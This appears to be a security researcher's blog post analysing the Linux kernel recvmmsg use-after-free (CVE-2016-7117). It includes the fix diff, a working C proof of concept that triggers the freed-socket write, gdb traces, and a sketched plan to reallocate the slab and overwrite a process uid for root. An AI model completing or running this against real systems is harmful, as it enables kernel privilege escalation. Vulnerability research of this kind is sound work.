Notes about CVE-2016-7117

It's hard to find information about this, so I started looking deeper.

The Register has some cursory information:

The first of these (CVE-2016-7117) lies in the kernel networking subsystem allowing remote attackers to execute arbitrary code in the context of the kernel.

("Another critical hole (CVE-2016-0758 ) allows installed apps to execute arbitrary code within the context of the kernel via an elevation of privilege vulnerability in the kernel ASN.1 decoder." sounds fun too…)

The Debian and Ubuntu bug trackers both describe this as "use after free in the recvmmsg exit path", which is a big hint. The Debian page lists 4.5.2-1 as the "Fixed Version", which was released in April. That page's changelog includes "net: Fix use after free in the recvmmsg exit path". And so I found this email from March from Arnaldo Carvalho de Melo, with a patch:

diff --git a/net/socket.c b/net/socket.c
index c044d1e8508c..db13ae893dce 100644
--- a/net/socket.c
+++ b/net/socket.c
@@ -2240,31 +2240,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                cond_resched();
        }

-out_put:
-       fput_light(sock->file, fput_needed);
-
        if (err == 0)
-               return datagrams;
+               goto out_put;

-       if (datagrams != 0) {
+       if (datagrams == 0) {
+               datagrams = err;
+               goto out_put;
+       }
+
+       /*
+        * We may return less entries than requested (vlen) if the
+        * sock is non block and there aren't enough datagrams...
+        */
+       if (err != -EAGAIN) {
                /*
-                * We may return less entries than requested (vlen) if the
-                * sock is non block and there aren't enough datagrams...
+                * ... or  if recvmsg returns an error after we
+                * received some datagrams, where we record the
+                * error to return on the next call or if the
+                * app asks about it using getsockopt(SO_ERROR).
                 */
-               if (err != -EAGAIN) {
-                       /*
-                        * ... or  if recvmsg returns an error after we
-                        * received some datagrams, where we record the
-                        * error to return on the next call or if the
-                        * app asks about it using getsockopt(SO_ERROR).
-                        */
-                       sock->sk->sk_err = -err;
-               }
-
-               return datagrams;
+               sock->sk->sk_err = -err;
        }
+out_put:
+       fput_light(sock->file, fput_needed);

-       return err;
+       return datagrams;
 }

 SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
-- 
2.5.0

This was merged and became 34b88a6 in the kernel repository.

This code is in __sys_recvmmsg; it looks roughly like this (before the fix, at b6e4038, with irrelevant bits replaced with /* ... */):

Listing 1: net/socket.c:2169@b6e4038

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                   unsigned int flags, struct timespec *timeout)
{
        int fput_needed, err, datagrams;
        struct socket *sock;
        struct mmsghdr __user *entry;
        struct compat_mmsghdr __user *compat_entry;
        struct msghdr msg_sys;
        struct timespec end_time;

        if (timeout &&
            poll_select_set_timeout(&end_time, timeout->tv_sec,
                                    timeout->tv_nsec))
                return -EINVAL;

        datagrams = 0;

        sock = sockfd_lookup_light(fd, &err, &fput_needed);
        if (!sock)
                return err;

        err = sock_error(sock->sk);
        if (err)
                goto out_put;

        entry = mmsg;
        compat_entry = (struct compat_mmsghdr __user *)mmsg;

        while (datagrams < vlen) {
                /* ... */
                        err = ___sys_recvmsg(sock,
                                             (struct user_msghdr __user *)entry,
                                             &msg_sys, flags & ~MSG_WAITFORONE,
                                             datagrams);
                        if (err < 0)
                                break;
                        err = put_user(err, &entry->msg_len);
                        ++entry;
                }

                if (err)
                        break;
                ++datagrams;
                /* ... */
        }

out_put:
        fput_light(sock->file, fput_needed);

        if (err == 0)
                return datagrams;

        if (datagrams != 0) {
                /*
                 * We may return less entries than requested (vlen) if the
                 * sock is non block and there aren't enough datagrams...
                 */
                if (err != -EAGAIN) {
                        /*
                         * ... or  if recvmsg returns an error after we
                         * received some datagrams, where we record the
                         * error to return on the next call or if the
                         * app asks about it using getsockopt(SO_ERROR).
                         */
                        sock->sk->sk_err = -err;
                }

                return datagrams;
        }

        return err;
}

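Both versions call sockfd_lookup_light and fput_light, but the old code calls fput_light at out_put before it has finished with sock, and then goes on to write sock->sk->sk_err. The new code moves out_put and the fput_light call to the very end, after that write. The email explains: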

And, as Dmitry rightly assessed, that is because we can drop the reference and then touch it when the underlying recvmsg calls return some packets and then hit an error, which will make recvmmsg to set sock->sk->sk_err, oops, fix it.

So, to demonstrate the use after free:

recvmmsg calls sockfd_lookup_light, which probably increases the refcount.
recvmmsg calls recvmsg
recvmsg returns a real packet. datagrams is incremented from 0.
recvmmsg calls recvmsg
recvmsg returns an error other than -EAGAIN.
recvmmsg breaks to the end of the while
fput_light is called, which decreases the refcount if it was increased above. Then the struct socket may be freed at any point.
err != 0, so we don't return datagrams
datagrams != 0, and err != -EAGAIN, so we do sock->sk->sk_err = -err. This sock may have been freed after fput_light, so this is a use after free.
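
The ordering problem in the steps above can be sketched as a userspace toy model. Nothing here is kernel code: struct toy_sock, toy_put, and the two exit_path_* functions are hypothetical stand-ins, and "freed" is just a flag rather than a real free. The only thing the sketch tries to capture is that the old exit path drops the reference before recording the error, and the fixed one does it afterwards.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Hypothetical stand-in for the socket; not the kernel's real structs. */
struct toy_sock {
	int refs;    /* models the reference count on sock->file */
	bool freed;  /* set once the last reference has been dropped */
	int sk_err;  /* models sock->sk->sk_err */
};

/* Models fput_light() with fput_needed set: drop one reference. */
void toy_put(struct toy_sock *s)
{
	assert(s->refs > 0);
	if (--s->refs == 0)
		s->freed = true;
}

/* Records the pending error; reports whether the object was already freed. */
bool toy_record_err(struct toy_sock *s, int err)
{
	bool touched_after_free = s->freed;

	s->sk_err = -err;
	return touched_after_free;
}

/* True when the exit path has to stash the error for the next call. */
bool toy_must_record(int err, int datagrams)
{
	return err != 0 && datagrams != 0 && err != -EAGAIN;
}

/* Pre-fix ordering: drop the reference first, then touch the socket. */
bool exit_path_old(struct toy_sock *s, int err, int datagrams)
{
	bool uaf = false;

	toy_put(s);
	if (toy_must_record(err, datagrams))
		uaf = toy_record_err(s, err);
	return uaf;
}

/* Post-fix ordering: touch the socket first, drop the reference last. */
bool exit_path_new(struct toy_sock *s, int err, int datagrams)
{
	bool uaf = false;

	if (toy_must_record(err, datagrams))
		uaf = toy_record_err(s, err);
	toy_put(s);
	return uaf;
}
```

To model the race, start with refs = 2 (one for the fd table, one for the lookup), call toy_put once to stand in for the other thread's close, and then run either exit path with err = -EFAULT and datagrams = 1. Only exit_path_old reports a write to an already-freed object.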

Questions:

How do we make recvmsg error for the second packet?
For a use-after-free, we need that to actually have been freed. How do we do that?
Ultimately we want to get the allocation that takes the place where sock was, fill in the sk pointer, and get the kernel to write to a place we choose. Is that realistic?

I'm going to think about this first from the perspective of a local user, since remote exploitation seems much harder.

Making `recvmsg` err

So __sys_recvmmsg calls ___sys_recvmsg, which calls copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov) and returns the error if that call fails:

Listing 2: net/socket.c:2087@b6e4038

if (MSG_CMSG_COMPAT & flags)
        err = get_compat_msghdr(msg_sys, msg_compat, &uaddr, &iov);
else
        err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
if (err < 0)
        return err;

This looks promising (in copy_msghdr_from_user):

Listing 3: net/socket.c:1829@b6e4038

if (!access_ok(VERIFY_READ, umsg, sizeof(*umsg)) ||
    __get_user(uaddr, &umsg->msg_name) ||
    __get_user(kmsg->msg_namelen, &umsg->msg_namelen) ||
    __get_user(uiov, &umsg->msg_iov) ||
    __get_user(nr_segs, &umsg->msg_iovlen) ||
    __get_user(kmsg->msg_control, &umsg->msg_control) ||
    __get_user(kmsg->msg_controllen, &umsg->msg_controllen) ||
    __get_user(kmsg->msg_flags, &umsg->msg_flags))
        return -EFAULT;

and the manpage says

ERRORS These are some standard errors generated by the socket layer. Additional errors may be generated and returned from the underlying protocol modules; see their manual pages.

… EFAULT The receive buffer pointer(s) point outside the process's address space.

So I think we can send two valid messages, and have the second recvmmsg header point to a bad receive buffer.
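
Before involving recvmmsg at all, the EFAULT behaviour can be checked with a plain recvmsg from userspace. The following is a minimal sketch, assuming Linux and an AF_UNIX datagram socketpair; the function name errno_for_bad_receive_buffer is made up for this example. It queues one datagram and then asks the kernel to receive it into an address that cannot be part of the process's address space.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/*
 * Queues one datagram on a socketpair, then tries to receive it into a
 * buffer outside our address space. Returns the errno set by recvmsg(),
 * or 0 if recvmsg() unexpectedly succeeded.
 */
int errno_for_bad_receive_buffer(void)
{
	static const char payload[] = "hello!";
	int fds[2];
	int result;

	/* Demo code: treat setup failures as fatal. */
	int rc = socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
	assert(rc == 0);
	ssize_t sent = send(fds[0], payload, sizeof(payload), 0);
	assert(sent == (ssize_t)sizeof(payload));

	struct iovec iov = {
		.iov_base = (void *)UINTPTR_MAX, /* deliberately invalid */
		.iov_len = 1024,
	};
	struct msghdr hdr;
	memset(&hdr, 0, sizeof(hdr));
	hdr.msg_iov = &iov;
	hdr.msg_iovlen = 1;

	/* MSG_DONTWAIT so a surprise on the send side cannot hang the demo. */
	if (recvmsg(fds[1], &hdr, MSG_DONTWAIT) < 0)
		result = errno;
	else
		result = 0;

	close(fds[0]);
	close(fds[1]);
	return result;
}
```

If the reasoning above holds, the return value should be EFAULT, which is the same error the second entry of the recvmmsg vector is meant to provoke.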

Closing the socket

This should be as easy as closing the socket in question in a thread while another thread is in recvmmsg.

Trying it out

We'll try triggering the panic from userspace.

Listing 4: try_recvmmsg.c

/* -*- compile-command: "gcc -Wall -Werror -pthread -static try_recvmmsg.c -o try_recvmmsg" -*- */
#define _GNU_SOURCE
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <pthread.h>

#define msg "hello!"

struct thread_config {
	int fds[2];
	char data[1024];
};

void *send_and_close_in_thread (void *arg)
{
	struct thread_config *config = arg;
	/* send the messages */
	for (size_t i = 0; i < 2; i++) {
		if (send(config->fds[0], msg, sizeof(msg), 0) != sizeof(msg)) {
			fprintf(stderr, "++ in send: %m\n");
			close(config->fds[0]);
			close(config->fds[1]);
			return NULL;
		}
	}
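	/* wait for the first message to be received, then close things, so that the kernel doesn't EBADF;
	   read through a volatile pointer because the kernel, not this thread, writes the buffer */
	while (*(volatile char *)config->data != msg[0]);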
	close(config->fds[0]);
	close(config->fds[1]);
	return NULL;
}

int main (int argc, char **argv)
{
	fprintf(stderr, "++ running!\n");
	struct thread_config config = {0};
	if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, config.fds)) {
		fprintf(stderr, "++ in socketpair: %m\n");
		return 1;
	}
	pthread_t thread = {0};
	if (pthread_create(&thread, NULL, send_and_close_in_thread, &config)) {
		fprintf(stderr, "++ in pthread_create: %m\n");
		close(config.fds[0]);
		close(config.fds[1]);
		return 1;

	}
	/* receive the first message fine.
	   try to receive the second message to a buffer out of our address space,
	   so that ___sys_recvmsg will return EFAULT. */
	recvmmsg(config.fds[1],
		 (struct mmsghdr[2]) {
			 {
				 .msg_hdr = {
					 .msg_iov = & (struct iovec) {
						 .iov_base = &config.data,
						 .iov_len = sizeof(config.data)
					 },
					 .msg_iovlen = 1
				 }
					 
			 },
			 {
				 .msg_hdr = {
					 .msg_iov = & (struct iovec) {
						 .iov_base = (void*) (~0),
						 .iov_len = 1024,
					 },
					 .msg_iovlen = 1
				 }
					 
			 },
		 },
		 2,
		 0,
		 & (struct timespec) { .tv_sec = 1 });
	fprintf(stderr, "++ no panic? got %s.\n", config.data);
	return 1;
		 
}

The timing is a little tricky: we have a thread send messages, wait for the first one to be received, and then close the fds. If it closes before the call to __sys_recvmmsg, __sys_recvmmsg will return EBADF. If it closes after __sys_recvmmsg sets the error on the struct sock, we won't get a use-after-free.

Then the main thread tries to recvmmsg two messages, with a bad result buffer pointer on the second one. This way the second ___sys_recvmsg call errors, getting us on the code path we hit before.

I checked this was the right code path like this (gdb connected to qemu):

(gdb) b copy_msghdr_from_user 
Breakpoint 21 at 0xffffffff82668db0: file net/socket.c, line 1823.
(gdb) c
Continuing.
[Switching to Thread 1]

Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
1823	{
(gdb) finish
Run till exit from #0  copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737e18, msg=0x1ffff1000d6e6003, msg_sys=0xffff88006b737df8, 
    flags=225341379, nosec=<optimized out>) at net/socket.c:2091
2091			err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $59 = 0
(gdb) c
Continuing.

Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
1823	{
(gdb) finish
Run till exit from #0  copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737b10, msg=0xffff88006b737b28, msg_sys=0xffff88006b737df8, 
    flags=225341266, nosec=<optimized out>) at net/socket.c:2091
2091			err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $60 = -14
(gdb) b socket.c:2265
Breakpoint 22 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.

Thread 1 hit Breakpoint 22, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7ffc232faac0, vlen=<optimized out>, flags=0, 
    timeout=0xffff88006b737ee0) at net/socket.c:2265
2265				sock->sk->sk_err = -err;
(gdb)

After running it under gdb many times in a VM built on b6e4038 (the commit immediately before the fix), I got this (my notes in /* ... */ inline):

(gdb) b __sys_recvmmsg
Breakpoint 12 at 0xffffffff8266b440: file net/socket.c, line 2171.
(gdb) b socket.c:2265 /* sock->sk->sk_err = -err; */
Breakpoint 15 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.

Thread 2 hit Breakpoint 12, __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=2, flags=0, timeout=0xffff88006c4e7ee0)
    at net/socket.c:2171
2171	{
/* temporary break at sockfd_lookup_light so we can 'finish' in it to see what it returns,
   as a cute trick to get around "<optimized out>" */
(gdb) tbreak sockfd_lookup_light 
Temporary breakpoint 20 at 0xffffffff82665940: file net/socket.c, line 450.
(gdb) c
Continuing.

Thread 2 hit Temporary breakpoint 20, sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8)
    at net/socket.c:450
450	{
(gdb) finish
Run till exit from #0  sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450
__sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2187
2187		if (!sock)
Value returned is $50 = (struct socket *) 0xffff88006bf61e00
(gdb) c
Continuing.

Thread 2 hit Breakpoint 15, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7fff9f3ccc80, vlen=<optimized out>, flags=0, 
    timeout=0xffff88006c4e7ee0) at net/socket.c:2265
2265				sock->sk->sk_err = -err;
/* !!! */
(gdb) p ((struct socket *)0xffff88006bf621c0)->file.f_count
Cannot access memory at address 0x38
/* ->file has been zeroed out, meaning this has been freed and used for something else */
(gdb) p ((struct socket *)0xffff88006bf621c0)->sk
$52 = (struct sock *) 0x0 <irq_stack_union>
(gdb) p &(((struct socket *)0xffff88006bf621c0)->sk->sk_err)
$53 = (int *) 0x1b0 <irq_stack_union+432>
(gdb)

So yes, we've got a use-after-free, and the kernel writes -err to the address at 0x1b0.
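
Since sk was NULL in that run, the 0x1b0 is just the offset of sk_err inside struct sock in this particular build. A small sketch of the arithmetic, assuming that offset and using a hypothetical padded struct (toy_sock_layout) in place of the real struct sock:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical layout: only the offset of sk_err (0x1b0, taken from the
 * gdb output for this build) is meant to match the real struct sock.
 */
struct toy_sock_layout {
	char other_fields[0x1b0];
	int sk_err;
};

/* Address the kernel would write to for a given value of sock->sk. */
uintptr_t sk_err_address(uintptr_t sk)
{
	return sk + offsetof(struct toy_sock_layout, sk_err);
}

/* Value sock->sk would need to hold for the write to land on `target`. */
uintptr_t sk_for_target(uintptr_t target)
{
	assert(target >= offsetof(struct toy_sock_layout, sk_err));
	return target - offsetof(struct toy_sock_layout, sk_err);
}
```

With sk == 0 this gives 0x1b0, matching the gdb session. The second helper is the inverse: it gives the sk value we would have to plant in the reallocated memory to aim the write at a chosen address.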

Why does it only work sometimes? I think it's because the actual free and using it again happens outside of the fput_light call tree, so we're racing with another task or two in the kernel. But we can do it repeatedly until it does work; it doesn't take long.

Reallocation

So we need to put some data where that struct socket used to be, such that sk is a pointer to a piece of data whose offset sk_err is where we would like to write.

struct socket is part of struct socket_alloc:

Listing 5: include/net/sock.h:1220@b6e4038

struct socket_alloc {
        struct socket socket;
        struct inode vfs_inode;
};

They're allocated in sock_alloc / sock_alloc_inode using the slab allocator. This means that they're grabbed from "caches", which are spread across multiple "slabs". Caches are homogeneous type-wise, and e.g. each struct socket_alloc in a cache is pre-initialized.

Some resources about the slab allocator:

"Slab Allocation" on Wikipedia
"Anatomy of the Linux Slab Allocator" on IBM developerWorks (apparently no longer available, so this is a link to an archive).

I can think of a situation where we can use the slab allocator to get what we want to happen:

The slabs that are part of the struct socket_alloc cache (sock_inode_cache) fill up.
We create a socketpair for our use-after-free that occupies the first and second slot in a new slab.
We close both elements of our socketpair. This causes the slab to be freed. We then immediately add some items (more than a slabful) to another cache, with the pointer we want to write to at offset sk in each item.
This causes a new slab to be allocated for the second cache, which ideally will be exactly where our first cache used to be. So, the struct socket pointer in __sys_recvmmsg now points to an item we control in a new slab.
The kernel code runs and sets the offset sk_err from our pointer to -err.

Some things that make it easier:

We can just repeatedly try it until it works, allocating an extra socket each time so that we progress through the slab.
/proc/slabinfo says that sock_inode_cache has 12 objects per slab (in my VM; it seems to vary). This is an upper bound on the number of sockets we'll need to open to get an object at the beginning of the slab, assuming no other process is creating sockets.
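
As a rough sketch of how the numbers above could be pulled out programmatically: the first helper parses one line in the /proc/slabinfo 2.x layout (name, active_objs, num_objs, objsize, objperslab, ...), and the second does the "how many more sockets until the next slab starts" arithmetic. Both function names are invented for this example, and the second assumes nobody else is allocating from the cache.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Parses one line of /proc/slabinfo (format 2.x):
 *   name <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : ...
 * Returns 1 and fills the outputs only if the line describes `cache`;
 * returns 0 (outputs untouched) otherwise, including for header lines.
 */
int slabinfo_lookup(const char *line, const char *cache,
		    unsigned *objsize, unsigned *objperslab)
{
	char name[64];
	unsigned active, total, size, per_slab;

	if (sscanf(line, "%63s %u %u %u %u",
		   name, &active, &total, &size, &per_slab) != 5)
		return 0;
	if (strcmp(name, cache) != 0)
		return 0;
	*objsize = size;
	*objperslab = per_slab;
	return 1;
}

/*
 * Number of extra objects to allocate so that the next allocation is the
 * first in a fresh slab, given how many slots of the current slab are used.
 * Assumes no other allocations from the cache happen in between.
 */
unsigned sockets_to_slab_boundary(unsigned used_in_slab, unsigned objperslab)
{
	assert(objperslab > 0);
	return (objperslab - used_in_slab % objperslab) % objperslab;
}
```

In practice we don't know used_in_slab, which is why the text above falls back to trying every position; the helper only makes the upper bound explicit. Note also that each socketpair call allocates two sockets at once.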

That sounds totally possible!

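What are we getting the kernel to write? err is -14 (-EFAULT) in our case, so the kernel writes 14 for us. sk_err is an int, so on x86-64 this is a four-byte store of {0x0e, 0x00, 0x00, 0x00}. If we control the pointer, though, we can line it up only partially with a field we want to overwrite, putting any portion of those bytes anywhere we choose. Some ideas:

Overwrite the uid of our process with the store starting one byte early (so 0xe lands in the byte before it and the three zero bytes land on the low three bytes of the uid), so that it has uid 0. This works as long as the uid is below 2^24, since its top byte is then already zero.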
Overwrite a return address on the stack so that the kernel returns to code we choose. (This will be tricky with KASLR).
Overwrite a boolean on the stack to either 0 or 0xe (truthy) to get around some permission check.
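
The "partially lined up" write can be simulated on an ordinary byte buffer. This is only a sketch: it assumes the kernel's store is a 32-bit little-endian write of 14 (gdb shows sk_err as an int *), and the buffer stands in for kernel memory containing a 32-bit uid field. The helper names are made up.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Simulates a 32-bit little-endian store of `value` at byte offset `off`
 * inside `mem`, a stand-in for the kernel memory being overwritten.
 */
void store_le32(unsigned char *mem, size_t len, size_t off, uint32_t value)
{
	assert(off + 4 <= len);
	for (int i = 0; i < 4; i++)
		mem[off + i] = (unsigned char)(value >> (8 * i));
}

/* Reads a 32-bit little-endian field back out of `mem`. */
uint32_t load_le32(const unsigned char *mem, size_t len, size_t off)
{
	uint32_t v = 0;

	assert(off + 4 <= len);
	for (int i = 0; i < 4; i++)
		v |= (uint32_t)mem[off + i] << (8 * i);
	return v;
}
```

For example, put a uid of 1000 at offset 4 of an 8-byte buffer, then store 14 at offset 3. The byte before the uid becomes 0x0e, the low three bytes of the uid become zero, and the untouched top byte was already zero, so the field reads back as 0.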

However, I'm not actually sure how aggressively slabs get reused by different caches, and I'm not sure of an easy way to find out. But! We can probably use a lot of memory to make that happen, or try freeing a couple dozen slabs at the same time.

Which cache do we try to write to?

/proc/slabinfo says the sock_inode_cache has objects of size 640. This is an inconvenient number: the only other objects with that size are also inode caches, and they don't have any user-controllable data at the offset of sk_err.

But the kmalloc cache kmalloc-1024 has 1024-byte objects, and 16 of them fit in a slab. If we can find a path in the kernel that copies data we control into a kmalloc allocation bigger than 460 + sk_err + sizeof(void *) = 896, we can get the kernel to set an int at an address we choose to 14.
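
To see which requests would land in kmalloc-1024, here is a small sketch that rounds a request size up to a kmalloc size class. The list of classes is an assumption about a typical x86-64 build (powers of two plus 96 and 192), not something read from this kernel, and kmalloc_class_for is a made-up helper.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Assumed general-purpose kmalloc size classes for a typical x86-64 build.
 * Real kernels may differ by configuration and allocator.
 */
static const size_t kmalloc_classes[] = {
	8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192,
};

/* Smallest assumed size class that fits `size`, or 0 if none does. */
size_t kmalloc_class_for(size_t size)
{
	size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);

	assert(size > 0); /* zero-sized requests are out of scope here */
	for (size_t i = 0; i < n; i++)
		if (size <= kmalloc_classes[i])
			return kmalloc_classes[i];
	return 0;
}
```

Under that assumption, any request from 513 to 1024 bytes is served from kmalloc-1024, so a kmalloc call whose size is just over the 896 bytes mentioned above would be a candidate.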

But there are a lot of calls to kmalloc in the kernel, and finding a good one will take time. So I'm publishing this now; I'll write more when I find one.

How much trouble are we in?

I think this exploit will work, so we have a pretty bad local privilege escalation bug. I was able to trigger the use-after-free in less than an hour of work after reading the description of the bug, and I'm not even a kernel hacker. Given more time I'm pretty sure I could make it repeatably write to a location of our choice.

I think this would be difficult to exploit remotely, for the following reasons:

recvmmsg is much less common than recvmsg, in the wild. GitHub search shows about 800k uses of recvmmsg vs about 3.6 million for recvmsg. recvmsg isn't all that common anyway; recv has about 29 million uses on GitHub.
A remote attacker would need to cause the recvmsg to err and cause the socket to close while in the recvmmsg call. Looking casually, I didn't see a great way to cause recvmmsg to err from the sending side. recvmsg and recvmmsg are normally used for connectionless protocols, anyway, so I wouldn't expect it to be easy to cause a service to close its socket.

But I'd love to be proven wrong.